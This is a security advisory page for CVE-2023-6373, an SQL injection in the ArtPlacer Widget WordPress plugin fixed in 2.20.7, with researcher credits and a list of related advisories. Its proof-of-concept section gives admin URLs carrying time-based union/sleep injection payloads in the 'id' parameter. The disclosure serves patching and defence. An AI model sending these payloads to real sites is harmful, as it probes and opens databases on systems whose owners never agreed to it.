ArtPlacer Widget < 2.20.7 – Editor+ SQLi | CVE 2023-6373 | Plugin Vulnerabilities

Description

The plugin does not sanitize and escape the "id" parameter before submitting the query, leading to a SQLI exploitable by editors and above. Note: Due to the lack of CSRF check, the issue could also be exploited via a CSRF against a logged editor (or above)

Proof of Concept

As an editor, open

https://example.com/wp-admin/admin.php?page=edit-art-placer&id=1+union+select+1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C%28sleep%2820%29%29

Other POC:
https://example.com/wp-admin/admin.php?page=edit-art-placer&id=(sleep(20))
https://example.com/wp-admin/admin.php?page=edit-art-placer&id=1 union select 1,1,1,1,1,1,1,1,(sleep(20))

Affects Plugins

artplacer-widget

Fixed in 2.20.7

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Claudio Marchesini, Enrico Marcolini

Submitter

Claudio Marchesini, Enrico Marcolini

Submitter website

https://www.dottormarc.it

Verified

Yes

WPVDB ID

afc11c92-a7c5-4e55-8f34-f2235438bd1b

Timeline

Publicly Published

2023-12-07 (about 2 years ago)

Added

2023-12-07 (about 2 years ago)

Last Updated

2023-12-07 (about 2 years ago)

Other

Published

Title

Published

2024-06-05

Title

Contact Form to DB by BestWebSoft – Messages Database Plugin For WordPress < 1.7.3 - Authenticated (Author+) SQL Injection

Published

2021-07-15

Title

Woocommerce 3.3 to 5.5 - Authenticated Blind SQL Injection

Published

2024-10-10

Title

SEUR Oficial < 2.2.11 - Unauthenticated SQL Injection

Published

2024-10-14

Title

Ajax Rating with Custom Login <= 1.1 - Unauthenticated SQL Injection

Published

2015-08-21

Title

Gallery Bank < 3.0.330 - Authenticated Blind SQL Injection